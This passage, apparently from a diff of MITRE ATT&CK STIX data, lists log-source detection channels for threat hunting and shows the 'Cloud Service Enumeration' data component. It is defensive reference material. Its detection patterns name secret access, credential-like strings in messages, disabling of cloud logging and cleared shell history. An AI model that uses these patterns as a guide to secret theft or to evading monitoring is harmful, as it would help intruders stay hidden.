+                            "channel": "ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background"
+                        },
+                        {
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "smtpd$.*$: .*from=[.*@internaldomain.com](mailto:.*@internaldomain.com) to=[.*@internaldomain.com](mailto:.*@internaldomain.com)"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Inbound messages with anomalous headers, spoofed SPF/DKIM failures"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Inbound emails containing hyperlinks from suspicious sources"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Inbound email attachments logged from MTAs with suspicious metadata"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Mismatch between authenticated username and From header in email"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "High-frequency inbound mail activity to a specific recipient address"
+                        },
+                        {
+                            "name": "ApplicationLog:API",
+                            "channel": "Docker/Kubernetes API access from external sources"
+                        },
+                        {
+                            "name": "ApplicationLog:CallRecords",
+                            "channel": "Outbound or inbound calls to high-risk or blocklisted numbers"
+                        },
+                        {
+                            "name": "ApplicationLog:EntraIDPortal",
+                            "channel": "DeviceRegistration events"
+                        },
+                        {
+                            "name": "ApplicationLog:IIS",
+                            "channel": "IIS W3C logs in C:\\inetpub\\logs\\LogFiles\\W3SVC* (spikes in 5xx, RCE/SQLi/path traversal/JNDI patterns)"
+                        },
+                        {
+                            "name": "ApplicationLog:Ingress",
+                            "channel": "Kubernetes NGINX/Envoy ingress controller logs with anomalous payloads and 5xx spikes"
+                        },
+                        {
+                            "name": "ApplicationLog:Intune/MDM Logs",
+                            "channel": "Enrollment events (e.g., MDMDeviceRegistration)"
+                        },
+                        {
+                            "name": "ApplicationLog:MailServer",
+                            "channel": "Unexpected additions of sieve rules or filtering directives"
+                        },
+                        {
+                            "name": "ApplicationLog:Outlook",
+                            "channel": "Outlook client-level rule creation actions not consistent with normal user activity"
+                        },
+                        {
+                            "name": "ApplicationLog:WebServer",
+                            "channel": "/var/log/httpd/access_log, /var/log/apache2/access.log, /var/log/nginx/access.log with exploit indicators and burst errors"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "SendEmail"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "InvokeModel"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "InvokeFunction: Unexpected or repeated invocation of functions not tied to known workflows"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "CreateUser|AttachRolePolicy|CreateAccessKey|UpdateAssumeRolePolicy|CreateLoginProfile"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "StopLogging, DeleteTrail, UpdateTrail: API calls that disable or modify logging services"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Repeated crash pattern within container or instance logs"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Elevated 5xx response rates in application logs or gateway layer"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "Add role assignment / ElevateAccess / Create service principal"
+                        },
+                        {
+                            "name": "azure:audit",
+                            "channel": "App registrations or consent grants by abnormal users or at unusual times"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "ConsentGrant: Suspicious consent grants to non-approved or unknown applications"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Modify Conditional Access Policy"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Register PTA Agent or Modify AD FS trust"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Resource access initiated using application credentials, not user accounts"
+                        },
+                        {
+                            "name": "docker:daemon",
+                            "channel": "container_create,container_start"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "Container exited with non-zero code repeatedly in short period"
+                        },
+                        {
+                            "name": "docker:runtime",
+                            "channel": "execution of cloud CLI tool (e.g., aws, az) inside container"
+                        },
+                        {
+                            "name": "EDR:detection",
+                            "channel": "ThreatDetected, QuarantineLog"
+                        },
+                        {
+                            "name": "EDR:detection",
+                            "channel": "ThreatLog"
+                        },
+                        {
+                            "name": "esxi:esxupdate",
+                            "channel": "/var/log/esxupdate.log contains VIB installed with `--force` or `--no-sig-check` and non-standard acceptance levels"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "/var/log/hostd.log anomalies (faults, crashes, restarts) around inbound connections"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Keywords: 'Backtrace','Signal 11','PANIC','hostd restarted','assert' or 'Service terminated unexpectedly' in /var/log/hostd.log, /var/log/vmkernel.log, /var/log/syslog.log."
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "unexpected script/command invocations via hostd"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Guest Operations API invocation: StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, InitiateFileTransferFromGuest"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "unexpected script invocations producing long encoded strings"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Host daemon command log entries related to vib enumeration"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "New extension/module install with unknown vendor ID"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "vmkernel / OpenSLP logs for malformed requests"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "Symmetric crypto routines triggered for external session"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "ESXi process initiating asymmetric handshake with external host"
+                        },
+                        {
+                            "name": "gcp:workspaceaudit",
+                            "channel": "SendAs: Outbound messages with alias identities that differ from primary account"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Secure text entry focus and editingChanged bursts not typical for the app"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Repeated canOpenURL checks across diverse schemes (\u2265N within short window)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)"
+                        },
+                        {
+                            "name": "journald:Application",
+                            "channel": "Segfault or crash log entry associated with specific application binary"
+                        },
+                        {
+                            "name": "journald:systemd",
+                            "channel": "Repeated service restart attempts or unit failures"
+                        },
+                        {
+                            "name": "kubernetes:orchestrator",
+                            "channel": "Access to orchestrator logs containing credentials (Docker/Kubernetes logs)"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "cleared or truncated .bash_history"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "usb * new|thunderbolt|pci .* added|block.*: new .* device"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Inbound messages from webmail services containing attachments or URLs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kernel|systemd messages indicating 'segmentation fault'|'core dumped'|'service terminated unexpectedly' for sshd, smbd, vsftpd, mysqld, httpd, etc."
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "System daemons initiating encrypted sessions with unexpected destinations"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "milter configuration updated, transport rule initialized, unexpected script execution"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Repetitive HTTP 408, 500, or 503 errors logged within short timeframe"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Application or browser logs (webview errors, plugin enumerations) indicating suspicious script evaluation or plugin loads"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "processes binding to non-standard ports or sshd configured on unexpected port"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "system daemons initiating TLS sessions outside expected services"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "browser/office crash, segfault, abnormal termination"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Error/warning logs from services indicating load spike or worker exhaustion"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched from_domain vs return_path_domain"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "suspicious DHCP lease assignment with unexpected DNS or gateway"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "opened document|clicked link|segfault|abnormal termination|sandbox"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Authentication attempts into finance-related servers from unusual IPs or times"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sshd sessions with unusual port forwarding parameters"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Non-standard processes negotiating SSL/TLS key exchanges"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Module registration or stacktrace logs indicating segmentation faults or unknown module errors"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Segfaults, kernel oops, or crashes in security software processes"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Emails containing cleartext secrets (password=, api_key=, token=) shared across internal/external domains"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Transport Rule Modification"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Admin Audit Logs, Transport Rules"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "MailDelivery: High-frequency delivery of messages or attachments to a single recipient"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "New-InboxRule: Automation that triggers abnormal forwarding or external link generation"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "MessageTrace logs"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "External sender message followed by user action involving links or attachments"
+                        },
+                        {
+                            "name": "m365:mailboxaudit",
+                            "channel": "Outlook rule creation or custom form deployment"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "AuthenticationDetails=fail OR SPF=fail OR DKIM=fail OR DMARC=fail"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "X-MS-Exchange-Organization-AutoForwarded"
+                        },
+                        {
+                            "name": "m365:purview",
+                            "channel": "MailItemsAccessed & Exchange Audit"
+                        },
+                        {
+                            "name": "m365:purview",
+                            "channel": "MailItemsAccessed, Search-Mailbox events"
+                        },
+                        {
+                            "name": "m365:teams",
+                            "channel": "External chat request or new tenant communication preceding approval activity"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Unusual form activity within Outlook client, including load of non-default forms"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf, MessageSend, ClickThrough, MailItemsAccessed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf, MessageSend, AttachmentPreviewed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Emails with suspicious sender domains, spoofed headers, or anomalous attachment types"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed: Access of email attachments by Office applications"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Creation or modification of inbox rule outside of normal user behavior"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Inbound emails containing embedded or shortened URLs"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "AppRegistration: Unexpected application registration or OAuth authorization"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MessageSend, MessageRead, or FileAttached events containing credential-like patterns"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-Mailbox, Add-InboxRule, RegisterWebhook"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "ConsentGranted: Abuse of application integrations to mint tokens bypassing MFA"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Application Consent grants, new OAuth client registrations, or unusual admin-level activities executed by a user account shortly after suspected drive-by compromise"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Folder configuration updated with external or HTML-formatted Home Page via Set-MailboxFolder"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "PurgeAuditLogs, Remove-MailboxAuditLog"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-CsOnlineUser or UpdateAuthPolicy"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "New-InboxRule or Set-InboxRule events recorded in Exchange Online"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Transport rule or inbox rule creation events"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "GAL Lookup or Address Book download"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Inbound emails with attachments from suspicious or spoofed senders"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "certificate added or modified in application credentials"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Unusual MFA requests or OAuth consent events temporally aligned with user-reported vishing call"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set federation settings on domain|Set domain authentication|Add federated identity provider"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf/SendAs: Emails sent where the sending identity mismatches account ownership"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-MailboxAutoReplyConfiguration: Unexpected rule changes creating impersonated replies"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf/SendAs: Office Suite initiated messages using impersonated identities"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Read-only configuration review from GUI"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Modify Federation Settings or Update Authentication Policy"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Unusual spikes in inbound messages to a single recipient"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "PowerShell: Add-MailboxPermission"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Add-MailboxPermission or Set-ManagementRoleAssignment"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-PartnerOfRecord / CompanyAdministrator role assignments / New-DelegatedAdminRelationship"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Add-DelegatedAdmin, Set-PartnerOfRecord, Add-MailboxPermission, Set-OrganizationRelationship"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MailSend: Outlook messages with suspicious subject/body terms (e.g., urgent payment, wire transfer) targeting finance teams"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed, FileDownloaded, SearchQueried"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Detection of hidden macro streams or SetHiddenAttribute actions"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "RunMacro"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileUploaded or FileCopied events"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "TeamsMessageAccess, TeamsExport, ExternalAppAccess"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "TeamsMessagesAccessedViaEDiscovery, TeamsGraphMessageExport"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "ApplicationModified, ConsentGranted: Unexpected app consent or modification events linked to security evasion"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication"
+                        },
+                        {
+                            "name": "macos:jamf",
+                            "channel": "RemoteCommandExecution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Device attached|enumerated VID/PID"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Inbound email activity with suspicious domains or mismatched sender information"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "App/web server logs ingested via unified logging or filebeat (nginx/apache/node)."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Received messages with embedded or shortened URLs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Received messages containing embedded links or attachments from non-enterprise services"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process 'crashed'|'EXC_BAD_ACCESS' for sshd, screensharingd, httpd; launchd restarts of these daemons."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "opendirectoryd crashes or abnormal authentication errors"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Logs from unifiedlogging that show browser crashes, plugin enumerations, extension installs or errors around the same time as suspicious network fetches"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream cleared or truncated"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "quarantine or AV-related subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Repeated process crashes logged by CrashReporter or system instability logs in com.apple.console"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Inbound messages with attachments from suspicious domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outgoing or incoming calls with non-standard caller IDs or unusual metadata"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mail.app or third-party clients sending messages with mismatched From headers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process crash, abort, code signing violations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Configuration profile modified or new profile installed"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Crash log entries for a process receiving malformed input or known exploit patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Repetitive inbound email delivery activity logged within a short time window"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Application errors or resource contention from excessive frontend or script invocation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched header vs envelope domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "new DHCP configuration with anomalous DNS or router values"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mail or AppleScript subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "opened document|clicked link|EXC_BAD_ACCESS|abort|LSQuarantine"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Anomalous keychain access attempts targeting payment credentials"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Abnormal terminations of com.apple.security.* or 3rd-party security daemons"
+                        },
+                        {
+                            "name": "networkdevice:controlplane",
+                            "channel": "Syslog from edge devices with HTTP 500s on mgmt portal, SmartInstall events, unexpected CLI commands"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config push events"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "SIP REGISTER, INVITE, or unusual call destination metadata"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Failed authentication requests redirected to non-standard portals"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "PushNotificationSent"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Failed password or accepted password for SSH users"
+                        },
+                        {
+                            "name": "saas:Airtable",
+                            "channel": "EXPORT: User-triggered data export via GUI or API"
+                        },
+                        {
+                            "name": "saas:application",
+                            "channel": "High-frequency invocation of SMS-related API endpoints from publicly accessible OTP or verification forms (e.g., Twilio: SendMessage, Cognito: AdminCreateUser) with irregular destination patterns."
+                        },
+                        {
+                            "name": "saas:application",
+                            "channel": "High-volume API calls or traffic via messaging or webhook service"
+                        },
+                        {
+                            "name": "saas:audit",
+                            "channel": "Rule/ConfigChange: Auto-forward rules, delegate assignments, or changes to financial approval workflows"
+                        },
+                        {
+                            "name": "saas:audit",
+                            "channel": "Application added or consent granted: Integration persisting after original user disabled"
+                        },
+                        {
+                            "name": "saas:box",
+                            "channel": "User navigated to admin interface"
+                        },
+                        {
+                            "name": "saas:collaboration",
+                            "channel": "MessagePosted: Suspicious links or attachment delivery via collaboration tools (Slack, Teams, Zoom)"
+                        },
+                        {
+                            "name": "saas:confluence",
+                            "channel": "access.content"
+                        },
+                        {
+                            "name": "saas:email",
+                            "channel": "AuthenticationFailures (SPF/DKIM/DMARC) OR Domain Mismatch"
+                        },
+                        {
+                            "name": "saas:finance",
+                            "channel": "Transaction/Transfer: Unusual or large transactions initiated outside business hours or by unusual accounts"
+                        },
+                        {
+                            "name": "saas:github",
+                            "channel": "Bulk access to multiple files or large volume of repo requests within short time window"
+                        },
+                        {
+                            "name": "saas:gmail",
+                            "channel": "SendEmail, OpenAttachment, ClickLink"
+                        },
+                        {
+                            "name": "saas:googledrive",
+                            "channel": "FileOpen / FileAccess: Event-driven script triggering on user file actions"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "OAuth2 authorization grants / Admin role assignments"
+                        },
+                        {
+                            "name": "saas:hubspot",
+                            "channel": "contact_viewed, contact_exported, login"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Conditional Access policy rule modified or MFA requirement disabled"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "MFAChallengeIssued"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "WebUI access to administrator dashboard"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Federation configuration update or signing certificate change"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "System API Call: user.read, group.read"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "policy.rule.update;system.log.disable;admin.role.assign"
+                        },
+                        {
+                            "name": "saas:openai",
+                            "channel": "High volume of requests to /v1/chat/completions or /v1/images/generations"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "DataExport, RestAPI, Login, ReportExport"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "file_upload, message_send, message_click"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "chat.postMessage, files.upload, or discovery API calls involving token/credential regex"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "OAuth token use by unknown app client_id accessing private channels or files"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "conversations.history, files.list, users.info, audit_logs"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "xternal DM or workspace invite preceding credential or approval actions"
+                        },
+                        {
+                            "name": "saas:Snowflake",
+                            "channel": "QUERY: Large or repeated SELECT * queries to sensitive tables"
+                        },
+                        {
+                            "name": "saas:teams",
+                            "channel": "ChatMessageSent, ChatMessageEdited, LinkClick"
+                        },
+                        {
+                            "name": "saas:zoom",
+                            "channel": "unusual web session tokens and automation patterns during login"
+                        },
+                        {
+                            "name": "saas:zoom",
+                            "channel": "Unexpected contact interaction preceding follow-on admin requests"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook errors loading or processing custom form templates"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Office Add-in load errors, abnormal loading context, or unsigned add-in warnings"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook rule execution failure or abnormal rule execution context"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Exchange Transport Service loads unusual .NET assembly or errors upon transport agent execution"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Unexpected spikes in request volume, application-level errors, or thread pool exhaustion in web or API logs"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Browser or plugin/application logs showing script errors, plugin enumerations, or unusual extension load events"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook logs indicating failure to load or render HTML page in Home Page view"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "EventCode=1000"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Service crash, unhandled exception, or application hang warnings for critical services (e.g., IIS, DNS, SQL Server)"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "SCCM, Intune logs"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Unexpected web application errors or CMS logs showing modification to index.html, default.aspx, or other public-facing files"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "VPN, Citrix, or remote access gateway logs showing external IP addresses"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook rule creation, form load, or homepage redirection"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "High-frequency errors or hangs from resource-intensive application components (e.g., .NET, IIS, Office Suite)"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Exchange logs or header artifacts"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Unusual DLL/plugin registration for IIS/SQL/Apache or unexpected error logs"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=6416"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=1102"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Changes to applicationhost.config or DLLs loaded by w3wp.exe"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Device started/installed (UMDF) GUIDs"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=1000"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=104"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=1341, 1342, 1020, 1063"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.776000+00:00\", \"old_value\": \"2026-04-24 19:46:47.171000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0083",
+                            "external_id": "DC0083"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cloud Service Enumeration",
+                    "description": "Cloud service enumeration involves listing or querying available cloud services in a cloud control plane. This activity is often performed to identify resources such as virtual machines, storage buckets, compute clusters, or other services within a cloud environment. Examples include API calls like `AWS ECS ListServices`, `Azure ListAllResources`, or `Google Cloud ListInstances`. Examples: \n\nAWS Cloud Service Enumeration: The adversary gathers details about existing ECS services to identify opportunities for privilege escalation or exfiltration.\n- Azure Resource Enumeration: The adversary collects information about virtual machines, resource groups, and other Azure assets for reconnaissance purposes.\n- Google Cloud Resource Enumeration: The attacker seeks to map the environment and find misconfigured or underutilized resources for exploitation.\n- Office 365 Service Enumeration: The attacker may look for data repositories or collaboration tools to exfiltrate sensitive information.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetSecretValue"
+                        },
+                        {
+                            "name": "gcp:secrets",
+                            "channel": "accessSecretVersion"
+                        },
+                        {
+                            "name": "azure:ad",
+                            "channel": "SecretGet"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ssm:ListInventoryEntries"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "DescribeInstances, DescribeServices, ListFunctions: High frequency enumeration calls or unusual user agents performing discovery"
+                        },
+                        {
+                            "name": "azure:audit",
+                            "channel": "ListApplications, ListServicePrincipals: Large-scale queries against identity or application objects"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Get-MsolServicePrincipal, ListAppRoles: Service discovery operations executed by accounts not normally performing administrative tasks"
+                        },
+                        {
+                            "name": "saas:adminapi",
+                            "channel": "ListIntegrations, ListServices: Repeated service discovery requests from accounts without administrative responsibilities"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
